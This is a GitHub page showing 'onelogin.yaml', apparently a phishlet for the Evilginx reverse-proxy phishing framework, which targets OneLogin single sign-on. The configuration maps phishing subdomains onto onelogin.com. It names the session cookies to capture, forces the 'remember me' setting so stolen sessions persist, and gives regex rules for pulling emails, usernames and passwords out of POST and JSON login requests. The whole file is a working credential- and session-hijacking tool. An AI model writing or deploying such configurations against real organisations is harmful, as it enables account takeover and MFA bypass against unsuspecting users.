-
Notifications
You must be signed in to change notification settings - Fork 243
/
onelogin.yaml
52 lines (52 loc) · 1.85 KB
/
onelogin.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
name: 'onelogin'
author: '@perfectlylogical'
min_ver: '2.3.0'
# NOTE: Do not forget to change EXMAPLE to the relevant sub domain.
proxy_hosts:
- {phish_sub: '', orig_sub: '', domain: 'onelogin.com', session: false, is_landing: false }
- {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'onelogin.com', session: true, is_landing: true}
- {phish_sub: 'portal-cdn', orig_sub: 'portal-cdn', domain: 'onelogin.com', session: false, is_landing: false}
# Uncomment this line if the target is using the default CSS for onelogin. Will manifest as the login page not loading.
#- {phish_sub: 'web-login-cdn', orig_sub: 'web-login-cdn', domain: 'onelogin.com', session: false, is_landing: false}
sub_filters: []
auth_tokens:
- domain: '.onelogin.com'
keys: ['onelogin.com_user']
- domain: 'EXAMPLE.onelogin.com'
keys: ['sub_session_onelogin.com']
auth_urls:
- '/portal/'
- '/client/apps'
# This is used to force the rememebr me functionality if the target is using the /login url
# This method will not work if they are using the multistep login method on the /login2 url
force_post:
- path: '/sessions'
search:
- {key: 'authenticity_token', search: '.*'}
- {key: 'email', search: '.*'}
- {key: 'password', search: '.*'}
force:
- {key: 'persist_session', value: 'true'}
type: 'post'
# The post type is used to capture credentials which use the /login url
# The json type is used to capture credentials which use the /login2 url
credentials:
username:
key: 'email'
search: '(.*)'
type: 'post'
password:
key: 'password'
search: '(.*)'
type: 'post'
username:
key: 'login'
search: '"login":"(.*)"'
type: 'json'
password:
key: 'password'
search: '"password":"(.*)",'
type: 'json'
login:
domain: 'EXAMPLE.onelogin.com'
path: '/login'